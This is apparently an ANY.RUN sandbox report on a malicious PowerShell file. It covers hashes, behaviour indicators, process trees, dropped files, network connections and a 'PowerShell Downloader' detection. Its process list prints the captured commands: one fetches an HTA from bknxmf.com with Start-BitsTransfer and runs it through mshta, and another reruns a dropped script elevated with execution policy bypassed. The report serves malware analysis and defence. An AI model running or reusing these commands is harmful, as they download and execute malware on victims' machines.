File name:

payload.ps1

Full analysis: https://app.any.run/tasks/5231881f-07d4-441f-a09d-428e594181e2
Verdict: Malicious activity
Analysis date: August 08, 2025, 09:34:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

4CBB8911521D70BC5187D9903CE3C997

SHA1:

3B13CE27DEF6F015EC63FF471F77BDD0DD812BAA

SHA256:

DBE3A83934B1C8BA9021A61A424F8671C73354D1C24200D68D18EA204B9F4778

SSDEEP:

3:VSJJFI9IrFhwQwDuxHEiioEYtXiW8+zicU0dWIpTVVs6MFIKg1:s8qXwQSQEJYtSomcU0MIpTVVs6MFIz1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4684)
      • powershell.exe (PID: 2188)
      • powershell.exe (PID: 4948)
    • Probably downloads file via BitsAdmin

      • powershell.exe (PID: 6224)
      • powershell.exe (PID: 6264)
    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 1652)
    • Checks whether a specified folder exists (SCRIPT)

      • mshta.exe (PID: 1652)
    • Creates a new folder (SCRIPT)

      • mshta.exe (PID: 1652)
    • Gets %appdata% folder path (SCRIPT)

      • mshta.exe (PID: 1652)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 2188)
    • Gets startup folder path (SCRIPT)

      • mshta.exe (PID: 1652)
    • Gets path to any of the special folders (SCRIPT)

      • mshta.exe (PID: 1652)
  • SUSPICIOUS

    • Starts process via Powershell

      • powershell.exe (PID: 6224)
      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 2188)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4684)
      • cmd.exe (PID: 4476)
      • powershell.exe (PID: 2188)
      • mshta.exe (PID: 1652)
    • Application launched itself

      • powershell.exe (PID: 4684)
      • powershell.exe (PID: 2188)
    • Manipulates environment variables

      • powershell.exe (PID: 6264)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 1652)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 1652)
    • Hides command output

      • cmd.exe (PID: 7104)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 7104)
    • The process executes Powershell scripts

      • mshta.exe (PID: 1652)
      • powershell.exe (PID: 2188)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 1652)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 1652)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4948)
  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 4476)
    • Create files in a temporary directory

      • svchost.exe (PID: 6356)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 1652)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
147
Monitored processes
15
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
1652"C:\WINDOWS\system32\mshta.exe" C:\Users\admin\AppData\Local\Temp\UE.hta C:\Windows\System32\mshta.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
1852timeout /t 2 C:\Windows\System32\timeout.exe—cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2188"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process powershell -Verb RunAs -Wait -ArgumentList '-ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Roaming\RunCache\tasklo1.ps1"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
2400\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4476C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\payload.bat" "C:\Windows\System32\cmd.exe—explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4684"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\payload.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4948"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Roaming\RunCache\tasklo1.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
5904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6224"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "=C:\Users\admin\AppData\Local\Temp+'\UE.hta';Start-BitsTransfer -Source 'http://bknxmf.com/' -Destination ;Start-Process mshta "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe—powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
23 871
Read events
23 870
Write events
1
Delete events
0

Modification events

(PID) Process:(6356) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
Operation:writeName:PerfMMFileName
Value:
Global\MMF_BITS66243199-6f57-4a00-a594-96d3366f3d08
Executable files
0
Suspicious files
10
Text files
11
Unknown types
1

Dropped files

PID
Process
Filename
Type
4684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF18df5e.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
4684powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aab2vlbi.43e.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:F59F16833398D0038D2A08F1BBDA987B
SHA256:59BEE0536AE5BCE222B5CC2B40293611D24938946316FBC931CB39FD86267834
4684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CU61IA5CQIWYWHJ8I6YJ.tempbinary
MD5:F59F16833398D0038D2A08F1BBDA987B
SHA256:59BEE0536AE5BCE222B5CC2B40293611D24938946316FBC931CB39FD86267834
4684powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zj4za1l1.fan.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4684powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:104B44978777E51C14D2B832A20389F6
SHA256:9ABF01A01CC2B54FE90B6E646B80749A2C77D257E9C5784757DD78AAD4A06491
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WF9HS08SDBD9DKR2SN41.tempbinary
MD5:64B69D858E50124604F17A480C994986
SHA256:9C4B6D5029994F1AF1851033A0FBA366DC552DF08C165A0166CA2FE575ADBA65
1652mshta.exeC:\Users\admin\AppData\Roaming\RunCache\tasklo1.ps1text
MD5:AE0C0B6407E0F5327887486696579744
SHA256:AE520E3CB6F3E8C9DEE215BE463302617552BEFD2A481D51C80863C051C86020
6356svchost.exeC:\Users\admin\AppData\Local\Temp\BIT2A81.tmphtml
MD5:468A0781C18EF1EE9423922A1EB4B2D1
SHA256:073BF00A7324076E380D6E9F19FC017A1C81AE6D47AA8C5A2D6993FFE012B9C5
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:64B69D858E50124604F17A480C994986
SHA256:9C4B6D5029994F1AF1851033A0FBA366DC552DF08C165A0166CA2FE575ADBA65
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
19
DNS requests
7
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
1268
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
814 b
whitelisted
1300
RUXIMICS.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
814 b
whitelisted
1300
RUXIMICS.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
814 b
whitelisted
6356
svchost.exe
HEAD
200
194.67.206.109:80
http://bknxmf.com/
RU
—
—
unknown
5944
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
6356
svchost.exe
GET
200
194.67.206.109:80
http://bknxmf.com/
RU
html
3.70 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
—
—
—
whitelisted
5944
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1300
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
—
—
—
whitelisted
5944
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1300
RUXIMICS.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1268
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.206
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
bknxmf.com
  • 194.67.206.109
unknown

Threats

PID
Process
Class
Message
6356
svchost.exe
A Network Trojan was detected
LOADER [ANY.RUN] Gen.Powershell.Downloader Script Payload
6356
svchost.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
No debug info